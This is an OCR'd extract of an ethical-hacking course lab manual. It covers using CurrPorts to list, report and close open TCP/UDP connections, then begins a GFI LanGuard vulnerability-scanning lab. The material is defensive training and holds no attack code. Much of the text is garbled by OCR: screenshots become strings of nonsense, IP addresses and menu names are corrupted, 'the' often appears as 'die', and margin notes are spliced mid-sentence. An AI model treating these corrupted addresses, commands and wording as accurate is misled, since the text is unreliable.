■ CurrPorts located at D :\ C E H -T o o ls \ C E H v 8 M o d u le 0 3 S c a n n in g
N e t w o r k s \ S c a n n in g T o o ls \ C u r r P o r t s

■ You can also download the latest version of C u rrP o rts from the link
http: / / www.nirsoft.11e t/utils/cports.html
■ If you decide to download the la t e s t v e r s io n , then screenshots shown
in the lab might differ
■ A computer running W in d o w s S erv er 2012
a Youcandownload
CuuPorts tool from ■ Double-click c p o r t s .e x e to run this tool
http://www.nirsoft.net.
■ Administrator privileges to run die C u rrP o rts tool

L a b D u r a t io n

Time: 10 Minutes

O v e r v ie w M o n it o r in g T C P / IP

Monitoring TCP/IP ports checks if there are m u ltip le IP connections established

Scanning TCP/IP ports gets information on all die opened T C P and U D P ports and
also displays all established IP addresses on die server.

Lab T asks

The CurrPorts utility is a standalone executable and doesn’t require any installation
process or additional DLLs (Dynamic Link Library). Extract CurrPorts to die
desired location and double click c p o r t s .e x e to launch.
TASK 1 1. Launch C u r r p o r t s . It a u t o m a t ic a lly d is p l a y s the process name, ports,
IP and remote addresses, and their states.
D is c o v e r T C P /IP
C urrP orts r‫ ־‬1 ‫ ״‬1 * ‫י‬
C o n n e c tio n
File Edit View Option* Help

xSD®v^!taer4*a-*
Process Na.. Proces... Protocol L ocal... Loc- Local Address Rem... Rem... R e rc te Address Remote Host Nam
( T enrome.ere 2 m TCP 4119 10.0.0.7 80 h ttp 173.194.36.26 bcm04501 -in ‫־‬f26.1
f <+1 rome.ere 2988 TCP 4120 10.0.0.7 80 h ttp 173.194.3626 bcmOisOl -in-f26.1
chrome.ere 2988 TCP 4121 10.0.0.7 80 h ttp 173.194.3626 bom04501‫־‬in ‫־‬f26.1
f chrome.exe 2 m TCP 4123 10.0.0.7 80 h ttp 215720420 a23-57-204-20.dep
CT chrome.exe 2 m TCP 414S 10.0.0.7 443 https 173.194 3626 bom04501 -in-f26.1
^ f i r t f c x ere 1368 TCP 3981 127.0.0.1 3982 12700.1 WIN-D59MR5HL9F
£ fir « fc x « x • 1368 TCP 3982 127.0.0.1 3981 12700.1 WIN-D39MR5HL9E
(£ fir« fc x «(« 1368 TCP 4013 10.0.0.7 443 https 173.1943622 bom01t01-in-f22.1
fircfcx.cxc 1368 TCP 4163 100.0.7 443 h ttp j 173.194.36.15 bom04!01 in ‫־‬f15.1
f 1rcfcxc.cc 1368 TCP 4166 100.0.7 443 h ttp j 173.194.360 bcm04501 -in-f0.1«
firef cx c<c 1368 TCP 4168 100.0.7 443 h ttp ; 74.125234.15 gra03s05in-f15.1e
\s , httpd.exe 1000 TCP 1070 aaao 0.0.0.0
\th ttp d .e x e 1800 TCP 1070 =
Q lsass.occ 564 TCP 1028 0.0.0.0 0.0.0.0
3 l» 5 5 a e 564 TCP 1028 =
____ »_____
<1 ■11 >
T
79 ~ctal Ports. 21 Remote Connections. 1Selected NirSoft Freeware. ht1p;/AnrA«v.rirsoft.net

C E H Lab M anual Page 104 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

FIGURE4.1:TlieCurrPortsmainwindowwithallprocesses, ports, andIPaddresses

2. CiirrPorts lists all die p ro ce sse s and their IDs, protocols used, lo c a l
/ / CurrPorts utilityis a a n d r e m o te IP a d d r e s s , local and remote ports, and r e m o te h o s t
standaloneexecutable,
whichdoesn't requireany n am e s.
installationprocess or
additional DLLs. 3. To view all die reports as an HTML page, click V ie w ‫ >־‬H T M L R e p o r t s
‫ ־‬A ll It e m s .

C urrP orts M °- x ‫י‬

File Edit I View | Options Help

X B 1 Show Grid Lines

Process KJa1^ I Show Tooltips Address Rem.. Remote Address Remote Host Nam *
chrome. Mark Odd/Even Rows ).7 http 173.1943526 bcmQ4s0l-in‫־‬f26.1
C* chromel HTML Report ‫ ־‬All I'errs
).7 http 173.194.3526 bcm04s0l-in-f26.1
^ chrome. ).7 http 173.194.3526 bcm04s01 -in-f26.1
HTML Report - Selected terns
C* chrome. ).7 http 23.5720420 a23-57-204-20.dep S
^ chromc. Choose Columns ).7 443 https 173.194.3526 bom04501-in‫־‬f26.1
(£ firc fc x .c A uto Size Columns .0.1 3962 127.0.0.1 WIN-D39MR5HL9E
g f-e fc x e R‫״‬fr#{h .0.1 3981 127.0.0.1 WIN-D39MR5HL9E
F5
(p firc fo x .e 1(c ‫קז‬7‫ס‬ 1l i --- TV.V,0.7 443 https 173.1943622 bem04s01-in-f22.1
(B fa e fc x u e 1368 TCP 4163 10.0.0.7 443 https 173.19436.15 bom04i01‫־‬in*f15.1
J ftfM c o ta e I368 TCP 4156 10.0.0.7 443 https 173.19436.0 bcm04s0l*in-f0.1<
® fr e fc x e te 1368 TCP 4158 100.0.7 443 https 741252*4.15 gruC3s05-1n‫־‬M5.1e
\h t t o d . e x e 1800 TCP 1070 o.ao.o 0.0.0.0

V h ttp d .e x e 1800 TCP 1070

Q ls a s s e te 564 TCP 1028 aaao 0.0.0.0
Q In thebottomleft of 561 TCP 1028

theCurrPorts window, the

status of total ports and 79Tct«l Ports, 21 Remote Connection!, 1 Selected NirSoft Freeware, http.//w w w .rirs o ft.n e t
remote connections
displays. FIGURE4.2TheCurrPortswithHTMLReport- AllItems
4. The HTML Report a u t o m a t ic a lly opens using die default browser.

E<e Ldr View History Bookmarks 1001‫ צ‬Hdp

I TCP/UDP Ports List j j f j__

^ ( J f t e /// C;/User1/ Ad mini st ralor/Desfctop/ cp0fts-xt>£,repcriJit ml ' ‫־־־*־‬£• - Google P ^

‫י‬
T C P /U D P P o r ts L is t

C re a te d b v u sing C u rrP o rts

E3 To checkthe
countries of theremote IP P ro titi I.o ra l I A ra l P o rt Remote
Rcm oU ‫׳‬
addresses, youhaveto P m « j .Nam•
ID
P ro to co l
P o rt X lB t
L o c a l A d d iv it
P o rt
P o rt R tm v l« A d d r t it

downloadthelatest IPto Name .

Countryfile. Youhaveto chxame rx c 2988 TCP 4052 10 0 0 7 443 https 173 194 36 4 bo
put the IpToCountry.csv‫״‬
fileinthe samefolder as chiome.exc 2988 TCP 4059 10.0.0.7 80 http 173.194.36.17 bo

cports.exe. ch101nc.exe 2988 TCP 4070 10.0.0.7 80 http 173.194.36.31 bo

daom e.exe 2988 TCP 4071 10.0.0.7 80 h ltp 173.194.36.31 bo!

daom e.exe 2988 TCP 4073 1 00.0.7 80 hup 173.194.36.15 boi

daom e.exe 2988 TCP 4083 10.0.0.7 80 http 173.194.36.31 bo!

cfcrorae.exe 2988 TCP 4090 100.0.7 80 hnp 173.194.36.4 bo!

chfomc.cxc 2988 TCP 4103 100.0.7 80 hup 173.194.36.25 bo

chrome exe 2988 TCP 4104 10 0 0 7 80 hnp 173 194 36 25 bo

>

FIGURE4.3:HieWebbrowserdisplayingCurrPortsReport- AllItems
5. To save the generated CurrPorts report from die web browser, click
F ile ‫ >־‬S a v e P a g e A s ...C t r l+ S .

C E H Lab M anual Page 105 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

TCP/UDP Ports List - Mozilla Firefox ‫ד‬3 5 ■

‫ ו ז ק‬id * «1ry> Hitory Bookmaikt Took Hrlp
m CurrPorts allowsyou fJcw l i b CW*T
to saveall changes (added N*w‫’ ׳‬Mnd<*1* Ctrt*N
andremovedconnections) Cpen Fie.. CcrUO
»f1‫׳‬Dcsttop/q)D1ts-x64/rEpor: html C i f ' Google P *
into alogfile. In order to S*.« Page As.. Ctr1*S
start writingto thelogfile, Send Link-
checkthe ,LogChanges' Pag* Setup-.
optionunder the File PrmtPi&Kw
menu E rrt.

ti* !.o ra l I o r a l P o rt Remote

K em otc
!, r o t i f j j >111• !'!‫ ־‬o to co l Local A d d rv u P o rt K e u io l* A d d n i t
P o rt Name P o ri
Name
ID
chiom c.exe 2988 TCP 4052 10.0.0.7 443 https 173.194.36.4 boj

cfc10 me.exe 2988 TCP 4059 10.0.0.7 80 http 173.194.36.17 bo:

chrome.exe 2988 TCP 4070 10.0.0.7 80 hnp 173.194.36.31 bo:

chrome.exe 2988 TCP 4071 10.0.0.7 80 http 173.194.36.31 boi

chrome exe 2988 TCP 4073 100 0 7 80 http 173 194 36 15 boi

2Zy"Bydefault, the logfile chrome exe 2988 TCP 408; 100 0 7 80 http 173 194 36 31 bo!

is savedas cports.loginthe ch*omc exe 2988 TCP 4090 100 0 7 80 http 173 194 36 4 boi
same folder where
cports.exeis located. You chiome.exe 2988 TCP 4103 10.0.0.7 80 http 173.194.36.25 boj

canchangethe default log daom e.exe 2988 TCP 4104 10.0.0.7 80 http 173.194.36.25 b03
filenamebysettingthe
LogFilenameentryinthe
cports.cfgfile. FIGURE4.4: TheWebbrowsertoSaveCurrPortsReport- AllItems
6. To view only die selected report as HTML page, select reports and click
V ie w ‫ >־‬H T M L R e p o r t s ‫ ־‬S e l e c t e d Ite m s .

C urrP orts 1-1° ‫ ׳‬x-

File Edit | View | Options Help

X S (3 Show Grid L‫א חו‬

Process Na P I Show Tooltips Address Rem... Rem... Remote Address Remote Host Nam
^ Be aware! The logfile C chrome. Mark Odd/Even Rows ).7 80 h ttp 175.19436.26 bom04s01-1n‫־‬f26.1
isupdatedonlywhenyou HTML Report - All Items ).7 80 h ttp 173.1943626 bom04s01-1n-f26.1
refreshtheports list C c h ro m e f
HTML Report ■ Selected terns F
80 h ttp 173.1943626 bcm04s01-in‫־‬f26.1f
manually, orwhenthe O'chrome “ ■0.7 80 h ttp 215720420 323-57-204-20.dep

AutoRefreshoptionis Choose Columns P7 445 h ttp : 173.1943526 bcm04s01-in-f26.1

turnedon. ® ,fir e fc x e Auto Size Columns Ctrl ♦■Plus .0.1 3982 127.0.0.1 WIN-D39MR5HL9E
(gfircfcxe: .0.1 3981 127JX011 WIN-D39MR5HL9E
Refresh F5
fircfcx e<v J>.7 443 https 173.1943622 bom04s01 -in-f22.1
L f ircfox.cxc 1368 TCP 4163 1000.7 443 h ttp ; 173.194.36.15 bomOlsOl -in ‫־‬f1 5.1
fircfcx.cxc 1368 TCP 4166 1000.7 443 h ttp : 173.194360 bomOlsOI -in ‫־‬f0.1c
^ firc fc x .c x c 1368 TCP -4168 100.0.7 443 https 74125234.15 gruC3s05 in -f 15.1c
httpd.exe 1000 TCP 1070 0.0.0.0 0.0.0.0
httpd.exe 1000 TCP 1070 s
Q lsa sse xe 564 TCP 1028 00.0.0 0.0.0.0
Q b a s te x e 564 TCP 1028
« -------a .-------- 14nn T rn ‫י«׳*־ו־‬ ___ AAA A AAAA

79 ~ctel Ports. 21 Remote Connections, 3 Selected Hi1 Soft Freew are. http.‫׳‬,‫׳‬,w w w .r irsoft.net

FIGURE4.5:CurrPortswithHTMLReport- SelectedItems
a Youcanalsoright-
clickonthe Webpageand 7. Tlie selected re p o rt automatically opens using the d e fa u lt b r o w s e r .
savethe report.

C E H Lab M anual Page 106 E th ic a l H ackin g and Counterm easures Copyright O by EC-Coundl
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

TCP/UDP Ports List - Mozilla Firefox I 1‫ ־‬n J~x

ffi'g |d : Vico Hatory Bookmaiks Toob Help
[ j TCP/UDP Ports List | +

^ W c/'/C /lherv‫׳‬Admin 1strotor/Dr5fctop/'cport5‫־‬r64/rcpo‫די‬i«0T1l P

(?‫ ־‬Google |,f t I
In the filters dialog
bos, youcanaddone or T C P /V D P P o rts L is t
more filter strings
(separatedbyspaces,
semicolon, or CRLF). C reated b y m in g C iir r P o m

Process Process Local I>ocal Local K«mut« Remote Kvuiotc

Name ID
Protocol Port Port Address Port Port Address RemoteHost Name State
.Name Name
dbiome.cxc 2988 TCP 4148 10.0.0.7 443 https 173.194.36-26 bom04sC 1 m. £26.1 e 100.net Established c:
fire fo x exe 1368 TCP 4163 10 0 0 7 443 https 173 194 36 15 bom 04s01 tn - fl 5. Ie l0 0 .n e t Established C:

h ttp d cxc 1800 TCP 1070 Listening C:

FIGURE4.6: TheWebbrowserdisplayingCuaPortswithHTMLReport- SelectedItems

/ / The Syntaxfor Filter 8. To save the generated CurrPorts report from the web browser, click
String: [include | exclude]:
[local | remote | both | F ile ‫ >־‬S a v e P a g e A s ...C t r l+ S
process]: [tcp | udp | ‫׳‬ r= > r* ‫י‬
tcpudp] : [IPRange | Ports TCP/‫׳‬UDP Ports List ‫ ־‬M ozilla Firefox

Range]. Edfe Vir* Hutory Boolvfmki Took HWp

N**‫׳‬T*b Clfl*T |+ |

Open Fie...
an*N
Ctrl»0
1r/Desktop/cpo»ts x6Crepwthtml fi *
S*.« P a g e A ;. Ctrl-S

Sir'd link-
Page :er.p.
Pnnt Preview
P rm L .

fic it Offline

Local Local
Po rt
T o ral Rem ote
Kcm ole
Po rt
Remote Rem ote Ilo t l .N io it
Name ID Pori Nam e Address Port Nam e
Address

chtoxne.exe 2988 TCP 4148 1 0 0 0 .7 443 https 1 73 .19 43 6 26 boxu04s01 -ui-1‘26. Ie l0 0 .n e t Established C

fiiefox-cxc 1368 TCP 4163 100.0.7 443 https 173.19436 15 bom04s01-1a-115.lel00.net Established C

http de xe 1800 TCP 10‫׳‬0

‫ ש‬Command-line option:
/stext <F11ename>means FIGURE4.7:TheWebbrcnvsertoSawQirrPortswithHTMLReport- SelectedItems
savethelist of all opened
TCP/UDPports into a 9. To view the p r o p e r t ie s of a port, select die port and click F ile ‫>־‬
regular text file.
P r o p e r tie s .

C E H Lab M anual Page 107 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

r® C urrP orts I - ] “ ' *

m
1 File J Edit View Options Help

I P N ctlnfo C trM

Close Selected TCP Connections Ctri+T Local Address Rem... Rem.. Remote Address Remote Host Nam ‫ י׳‬1
Kill Processes Of Selected Ports 10.0.0.7 80 http 173.194.3626 bom04301 - in-f26.1

Save Selected Items CtiUS 10.0.0.7 80 http 1‫׳־‬3.194.3626 bom04501 ‫ ־‬in-f26.1

10.0.0.7 80 http 1^3.194.36.26 bom04s01-in-f26.1
Properties Alt^Entei 1
10J3J3.7 80 http 23.57.204.20 a23*57204-20‫־‬.dep ■
Process Properties C tiU P
b&i Command-line option: 10.00.7 443 https 1Ti 194.36.26 bom 04s01-in-f2M

/stab <Filename> means Log Changes 127.0.0.1 3982 127.aa1 WIN-D39MR5Hl9f

savethelist of all opened Open Log File 127.0.0.1

10.0.0.7
3031
443 httpc
127.0L0L1
1‫־‬, 1 194.3622
WIM-D30MRSH10F
bom04e01-m‫־‬f22.1
TCP/UDP ports intoa Clear Log File
10.0.0.7 443 https 173.194.3615 bom04s01-m-f15.1
tab-delimitedtext file. Advanced Options CtrU O
10.0.0.7 443 https 173.194.360 bom04s01 m‫־‬f0.1c
Exit 10.0.0.7 443 https 74.12523415 gru03s05-in‫־‬f15.1 e
\ j 1ttjd .e x e 1800 TCP 1070 oaao 0 D S )S )
\h tto d .e x e 1800 TCP 1070 ::
□ lsass.exe 564 TCP 1028 aao.o 0D S J J J
Q lsass-exe $64 TCP 1028 r.

‫״‬ ‫ ־‬T >

|7 9 Tctel Ports, 21 Remote Connections, 1 Selected NirSoft Freeware, h ttp :'w w w .n irso ft.n e t

FIGURE4.8:CunPoitstoviewproperties foraselectedport
10. The P r o p e r t ie s window appears and displays all the properties for the
selected port.
11. Click O K to close die P r o p e r t ie s window
Properties *
Process Name: firefox.exe
Process ID: 1368
Protocol: TCP
Local Port: 4166
Local Port Name:
Local Address: 10.0.0.7
Remote Port: 443
Remote Port Name: |https________________
Command-line option: Remote Address: 1173.194.36.0
/shtml <Filename>means
savethelist of all opened Remote Host Name: bom04s01-in-f0.1e100.net
TCP/UDP ports into an State: Established
HTMLfile(Horizontal).
Process Path: C:\Program Files (x86)\M0zilla Firefox\firefox.exe
Product Name: Firefox
File Description: Firefox
File Version: 14.0.1
Company: Mozilla Corporation
Process Created On: 8/25/2012 2:36:28 PM
User Name: WIN-D39MR5HL9E4\Administrator
Process Services:
Process Attributes:
Added On: 8/25/2012 3:32:58 PM
Module Filename:
Remote IP Country:
Window Title:
OK

FIGURE4.9:TheCurrPortsPropertieswindowfortheselectedport

C E H Lab M anual Page 108 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

12. To close a TCP connection you think is suspicious, select the process
and click F ile ‫ >־‬C lo s e S e l e c t e d T C P C o n n e c t io n s (or C trl+ T ).
S T A S K 2
C urrPorts -_,»r ‫ד‬
C lo s e T C P
C o n n e c tio n IPNetlnfo Ctrt+1

Close Selected TCP Connections C trl-T Local Address Rem... Rem... Remote Address Remote Host Nam ‫ י ׳‬I
Kill Processes OfSelected Ports 10.0.0.7 60 http 173.19436.26 bom04s01-in‫־‬f26.1

Save Selected Items 10.0.0.7 80 http 173.19436.26 bom04s01-in‫־‬f26.1

CtH-S
10.0.0.7 80 http 173.19436.26 bom04sC1 in-f26.1
Properties AH- Enter
10.0.0.7 80 http 23.5730430 023-57 204 2C.dep =
Process Properties Ctrl—P
10.0.0.7 443 https 173.19436.26 bom04s01 in ‫־‬f26.1
Log Changes 127.00.1 3932 127.0.0.1 WIN-D39MR5HL9e
Cpen Log File 127.00.1 3931 127.0.0.1 WIN-D39MR5HL9£

Clear Log File

10.0.0.7 443 http: 173.19436.22 bom04s01 -in-f22.1

A d/snced Options CtH+G

10.0.0.7 443 https 173.19436.15 bom04s01-in-f15.1
443 https 173.19436.0 bom04s01 ■in-f0.1s
Exit 10.0.0.7 443 https 74.125.234.15 gru03s05-in-f151e
^ httpd.exe 1£03 TCP 1070 0D.0.0 0.0.0.0
httpd.exe 1800 TCP 1070 r
□ is a s s ^ x e 564 TCP 1028 om o o .a a o
Q toS fcC N e 564 TCP 1Q28 r

^ J III ‫־‬r I>

7? Tot«! Porte, 21 Remote Connection! 1 Selected IlirSort fre e w a re . r-tto :‫׳‬v/Yv*/n rso tt.n et
J
FIGURE4.10: ,HieCunPoitsCloseSelectedTCPConnectionsoptionwindow
13. To k ill the p ro ce sse s of a port, select die port and click F i le ‫ >־‬K ill
P r o c e s s e s o f S e l e c t e d P o r ts .

C urrP orts I ~ I ‫* 'ם‬

File j Edit View Options Help
f i TASK 3 PNetlnfo an♦!
Close Selected TCP Connection* C*rt*‫־‬T
K ill P r o c e s s Loral Address Rem... Rem.. Remote Addrect Remote Host Nam *
kin Processes Of Selected Ports 10.0.07 80 http 173.14436.26 bom04t01*in-f26.1

Clri-S 10.0.0.7 80 http 173.194.3626 bomC4t01-in‫־‬f26.1

5ave Selected Items
10.0.0.7 80 http 173.194.3626 bomC4j01 -in-f26.1
P ro p e rties A t-E n te r
10.0.0.7 80 http 215720420 a23-57-204-20.dep s
Process Properties CtrKP
10.0.0.7 443 https 173.1943636 bcmC4s01-in-f26.1
Log Changes 127.0.0.1 3962 127.0.0.1 WIN-D39MR5HL9E
Open Log File 127.0.0.1 3981 127.0.0.1 WIN-D39MR5HL9E

Clear Log file 10.0.0.7 443 https 173.1943632 bomC4s01-in-f22.1

10.0.07 443 https 173.19436.15 bom04s01‫־‬in‫־‬f15.1
Advanced Options
10.0.0.7 443 https 173.19436.0 bom04$0l‫־‬in‫־‬f0.1e
Exit 10.0.0.7 443 https 74125334.15 gru03s05-1n-M5.1e
V httod.exe 1800 TCP 1070 O.Q.Q.O 0.0.0.0

V h ttp d .e x e 1800 TCP 1070

□ lw s s .e r e 564 TCP 1028 o.aao
□ k a tc *re 561 TCP 1028
___ / )A A A
‫ר‬ II

79 Tctel Ports, 21 Remote Connections, 1 Selected MirSoft Freeware. http-Jta/ww.rirsoft.net

FIGURE4.11: TheCurrPortsKillProcessesofSelectedPortsOptionWindow
14. To e x it from the CurrPorts utility, click F ile ‫ >־‬E x it . The CurrPorts
window c l o s e s .

C E H Lab M anual Page 109 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Coundl
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

C u rrP on s 1-1° ‫ ׳‬- ’

File Edit View Options Help

P N etlnfo GH+I
Close Selected TCP Connections CtrK T .. Local Address Rem.. Rem‫״‬ Remcte Address Remcte Host Nam
K il Processes O f Selected Ports 10.0.0.7 80 http 173.194.36.26 bom04s01-in-f26.1

hid Command-line option: Save Selected Items Ctifc-S 10D.0.7 80 http 173.194.3626 bom04s01-in-f26.1

/sveihtml <Filename> Properties A t-E a te r

10.0.0.7 80 http 173.1943626 bom04s01-in‫־‬f26.1r
J
Savethelist of all opened Procccc Properties CtH«‫־‬P
10.0.0.7 80
443
http
httpt
21 57.204.20 a23-57-204-20.de

TCP/UDP ports into lo g Changes

10.0.0.7
127.0.0.1 3082
173.194.3626
127.0.0.1
bom04t01-in-f26.1|
WIN-D3QMR5H19P
HTMLfile(Vertical). Open Log File 127.0.0.1 3981 127X10.1 WIN-039MR5HL9E
10.0.0.7 443 https 173.19436.22 bomC4101-in-f22.1
Clear Log File
10.0.0.7 443 https 173.194.36.1S bemC4i01 in ‫־‬f15.1
Advanced O ption! C tH -0
10.0.0.7 443 https 173.194.36i) bcmC4s01 in f0.1q
Ext
1 10.0.0.7 443 https 74.125.234.15 gru03s05in-f15.1e
\th ttp d .e x e 1800 TCP 1070 0.0.0.0 0.0.0.0
\th ttp d .e x e 1800 TCP 1070 = =
Q lsa s& e xe 564 TCP 1028 0.0.00 0.0.0.0
H ls a is - a c 564 TCP 1028 =
‫־־‬ ■ rrn __ /‫ ו‬a / \ a AAAA

79 ‫ ז‬ctal Ports. 21 Remote Connections. 1 Selected Nil Soft free were. Mtpy/vvwvv.r it soft.net

FIGURE4.12: TheCurrPoitsExit optionwindow

L a b A n a ly s is

Document all die IP addresses, open ports and their running applications, and
protocols discovered during die lab.
feUIIn commandline, the
syntaxof /close Tool/U tility Information Collected/Objectives Achieved
command:/close <Local
Address> <Local Port> Profile Details: Network scan for open ports
<RemoteAddress>
<Remote Port‫* נ‬. Scanned Report:
■ Process Name
■ Process ID
■ Protocol
CurrPorts ■ Local Port
■ Local Address
■ Remote Port
■ Remote Port Name
■ Remote Address
■ Remote Host Name

C E H Lab M anual Page 110 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

P L E A S E T A L K TO YO UR IN S T R U C T O R IF YOU H A V E Q U ES T IO N S
R E L A T E D TO TH IS LAB.

Q u e s t io n s

1. Analyze the results from CurrPorts by creating a filter string that displays
Q CurrPorts allows you
toeasilytranslate all menus, only packets with remote TCP poit 80 and UDP port 53 and running it.
dialogboxes, and strings to
other languages. Analyze and evaluate die output results by creating a filter that displays only
die opened ports in die Firefox browser.
‫ כ‬. Determine the use of each of die following options diat are available under
die options menu of CurrPorts:
a. Display Established
b. Mark Ports Of Unidentified Applications
c. Display Items Widiout Remote Address
d. Display Items With Unknown State

Internet Connection Required

□ Yes 0 No
Platform Supported
0 Classroom 0 !Labs

C E H Lab M anual Page 111 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Lab

S c a n n in g f o r N e tw o rk
V u ln e r a b ilitie s U s in g t h e G F I
L a n G u a rd 2 0 1 2
G F I L A N g w r d s c a n s n e tw o rk s a n d p o r ts to d e te c t, a s s e s s , a n d c o rre c t a n y s e c u rity

v u ln e r a b ilitie s th a t a re fo u n d .

I CON K E Y L a b S c e n a r io
Valuable You have learned in die previous lab to monitor T C P IP and U D P ports 011 your
information
local computer or network using C u rrP o rts. This tool will automatically mark widi a
✓ Test your pink color suspicious TCP/UDP ports owned by u n id e n tifie d applications. To
knowledge prevent attacks pertaining to TCP/IP; you can select one or more items, and dien
Web exercise close die selected connections.
Q Workbook review Your company’s w e b s e r v e r is hosted by a large ISP and is well protected behind a
firewall. Your company needs to audit the defenses used by die ISP. After starting a
scan, a serious vulnerability was identified but not immediately corrected by the ISP.
All evil attacker uses diis vulnerability and places a b a c k d o o r on th e s e rv e r. Using
die backdoor, the attacker gets complete access to die server and is able to
manipulate the information 011 the server. The attacker also uses the server to
le a p fro g and attack odier servers 011 the ISP network from diis compromised one.

Z U T o o ls
d e m o n stra te d in
As a s e c u r it y a d m in is tra to r and p e n e tra tio n t e s t e r for your company, you need to
t h is la b a r e conduct penetration testing in order to determine die list of t h r e a t s and
a v a ila b le in v u ln e r a b ilitie s to the network infrastructure you manage. 111 diis lab, you will be
D:\CEH- using G F I L a n G u a rd 2 0 1 2 to scan your network to look for vulnerabilities.
T o o ls\ C E H v 8
M o du le 0 3 L a b O b j e c t iv e s
S c a n n in g
N e tw o rk s
The objective of diis lab is to help students conduct vulnerability scanning, patch
management, and network auditing.
111 diis lab, you need to:
■ Perform a vulnerability scan

C E H Lab M anual Page 112 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

■ Audit the network

■ Detect vulnerable ports
■ Identify security vulnerabilities
Q Youcandownload ■ Correct security vulnerabilities with remedial action
GFI LANguard from
http://wwwgfi.com.
L a b E n v ir o n m e n t

To perform die lab, you need:

■ GFI Languard located at D :\C EH -T o o ls\C E H v 8 M o d u le 0 3 S c a n n in g
N e tw o rk sW u ln e ra b ility S c a n n in g T o o ls\G F I L a n G u a rd

■ You can also download the latest version of G F I L a n g u a rd from the

link http://www.gfi.com/la1111etsca11
■ If you decide to download the la t e s t v e r s io n , then screenshots shown
in the lab might differ
■ A computer running W in d o w s 2012 S e rv e r as die host machine
■ W in d o w s S e r v e r 2 0 0 8 running in virtual machine
■ Microsoft ■NET F r a m e w o r k 2 .0
Q GFI LANguard
compatiblyworks on ■ Administrator privileges to run die G F I LA N g u a rd N e tw o rk S e c u r it y
Microsoft Windows Server Scann er
2008Standard/Enterprise,
Windows Server 2003 ■ It requires die user to register on the G F I w e b s it e
Standard/Enterprise,
Windows 7Ultimate, http: / / www.gfi.com/la1111etscan to get a lic e n s e k e y
Microsoft Small Business
Server 2008Standard, ■ Complete die subscription and get an activation code; the user will receive
Small Business Server 2003 an e m a il diat contains an a c tiv a tio n c o d e
(SP1), and Small Business
Server 2000(SP2).
L a b D u r a t io n

Time: 10 Minutes

O v e r v ie w o f S c a n n in g N e t w o r k

As an administrator, you often have to deal separately widi problems related to

v u ln e ra b ility issues, p a tc h m a n a g e m e n t, and network au d itin g . It is your
responsibility to address all die viilnerability management needs and act as a virtual
consultant to give a complete picture of a network setup, provide r is k a n a ly s is , and
maintain a secure and c o m p lia n t n e tw o rk state faster and more effectively.
C-J GFI LANguard
includesdefault Security scans or audits enable you to identify and assess possible r is k s within a
configuration settings that network. Auditing operations imply any type of c h e c k in g performed during a
allowyoutorun immediate
scans soonafter the network security audit. These include o p e n port checks, missing Microsoft p a t c h e s
installationis complete.
and v u ln e ra b ilitie s , service infomiation, and user or p r o c e s s information.

C E H Lab M anual Page 113 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
AB Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Lab T asks

Follow die wizard-driven installation steps to install die GFI LANguard network
scanner on die host machine windows 2012 server.
1. Navigate to W in d o w s S e r v e r 2 0 1 2 and launch the S t a r t menu by
B TASK 1 hovering the mouse cursor in the lower-left corner of the desktop
S c a n n in g for
V u ln e r a b ilitie s

Zenmap fileinstalls
the followingfiles: FIGURE5.1:WindowsServer2012- Desktopview
■ NmapCore Files
2. Click the G F I L an G u ard 2 0 1 2 app to open the G FI L an G u ard 2 0 1 2
■ NmapPath window
■ WinPcap 4.1.1
■ NetworkInterface
Import
■ Zenmap (GUI frontend) Marager
Windows Google

■ Neat (ModernNetcat) bm r ♦ *

■ Ndiff Nnd

e FT‫־‬
£ SI

2)12

FIGURE5.2WindowsServer2012- Apps
3. The GFI LanGuard 2012 m ain w in d o w appears and displays die N e tw o rk
A u d it tab contents.

/ / To executeascan
successfully, GFI
LANguardmust remotely
logonto target computers
withadministrator
privileges.

C E H Lab M anual Page 114 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

GFI LanGuard 2012

I -| dashboard Seen Remedy ActMty Monitor Reports Configuration UtSties W D13CIA3 this ■
‫י‬

W elcome to GFI LanG uard 2012

GFI LanGuard 2012 is ready to audit your network fc* rtireta&dites

Local Computer Vulnerability Level

V ie w D a s h b o a rd
us• ‫־‬Nana9#*gents‫־‬or Launch a scan‫ ־‬options 10,
e a The default scanning
options whichprovide
the entile network.
JP Inve30gate netvuor*wjinerawiir, status and audi results

quickaccess to scanning R e m o diate S e cu rity Iss u e s

modes are:
{ 'M o w
M<
9 Deploy missing patches uninstaiwwuihortwd *!*rare. turn on onllvirus and more

■ Quickscan c a f h 'e . — iim jIW - . M anage A g e n ts

■ Full scan Cunent Vulnerability Level is: High % Enable agents to automate netooric secant? audit and totfstribute scanning load
across client machines

■ Launcha customscan
L a u n c h a S can
■ Set up aschedule scan Manually set-up andtnuser an aoerSess neVrxt seajrit/ audrt.
-I
LATES1 NLWS

1‫־‬
V# ?4-A*j-7017 -Patch MmuxirTimri -N n pi txkul a fy n le d ID I -XI }u n jp \fe»g 1! Ttft ■mu lar ‫ ־‬l w mr‫»־‬
